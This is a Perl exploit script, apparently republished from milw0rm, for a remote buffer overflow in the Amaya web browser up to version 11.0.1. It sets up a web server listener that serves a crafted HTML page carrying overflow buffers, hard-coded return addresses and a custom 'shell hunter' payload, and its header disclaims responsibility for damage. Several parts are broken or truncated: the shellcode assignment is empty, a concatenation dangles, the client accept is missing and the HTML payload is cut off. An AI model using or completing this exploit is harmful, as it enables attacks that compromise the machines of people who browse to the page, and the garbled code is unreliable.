# Amaya Web Browser <= 11.0.1 Remote Buffer Overflow Exploit
# Found/Exploit by SkD (skdrat@hotmail.com)
# (skd@abysssec.com )
# -----------------------------------------------
# This is advanced buffer overflow exploitation using
# my new method called shellhunting :)
# Get more information about this at http://abysssec.com
# "Remember to connect to the webserver the link needs to end with .html, eg: ("s" can be whatever) "
# Exploit works only on a fully patched Vista SP1, but you
# may need to click 'Refresh' to make the shellcode exec
# sometimes.
# Note: Author has no responsibility over the damage you do with this!
use strict;
use warnings;
use IO::Socket;
my $html;
my $port_listen = 80; # change this to your desired port!
my $listenip = ""; # change this to your desired IP!
# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
# my own shell hunter.. :) it is 98% alphanumerical.
# 2nd variant of the shellhunter, to make the exploit more reliable..
my $shellhunter = ("\x58\x58\x40\x40").("\x47" x 4).("\x42" x 6). #inc edi
("\x42" x 24).("\x42" x 24).("\x39\x07\x75\x8b\x71\x71").
my $overflow = "\x42" x 158;
my $overflow2 = "\x42" x 4;
my $overflow3 = "\x43" x 430;
my $overflow4len = 977 - ((length($shellhunter) - 7)); #very important calculation
my $overflow4 = "\x44" x $overflow4len;
my $sled = "\x42" x 12;
my $sled2 = "\x41" x 24;
my $eip2 = "\x37\x55\x03\x10"; #10035537 call ecx, this won't be used
my $eip1 = "\x30\x4f\x01\x10"; #10014F30 call esi, this will be used.
my $heapaddr = "\x50\x0e\x08\x10"; #valid char for buffer, heap address
my $lookout = "\x37\x65\x41\x45" x 40; # 45446537 look out values <-
my $lookout2 = "\x37\x65\x41\x45\x41" x 4; # 45446537 <-
my $lookout3 = "\x37\x65\x41\x45\x41\x41" x 4; # 45446537 <-
my $lookout4 = "\x37\x65\x41\x45\x41\x41\x41" x 4; # 45446537 <-
my $additionaddr = "\x35\x65\x41\x45"; #used for an addition in the shellhunter (+2)
my $nopsled = "\x90\x90\x90\x90\x90\x90";
my $jmp = "\x75\x0c";
print "[x] Amaya Web Browser <= 11.0.1 Remote Buffer Overflow Exploit\n";
print "[x] Found/Exploit by SkD (skdrat@ hotmail.com)(skd@ abysssec.com)\n";
my $sock=new IO::Socket::INET(Listen=>1,LocalAddr => $listenip,LocalPort=>$port_listen,Proto=>'tcp');
die unless $sock;
print "[x] Waiting for clients on port ".$port_listen."..\n";
my $s;
print "[x] Got a client!\n";
my $request = <$s>;
print $s "HTTP/1.0 200 OK\nContent-Type: text/html\n\n";
print "[x] Serving Exploit HTML page :)\n";
print $s "<html>\n".
"<head><title>Welcome to SkD's world!</title></head>\n".
"<td nowrap=\x22nowrap".
close $s;
print "[x] Done!\n";
# milw0rm.com [2008-12-28]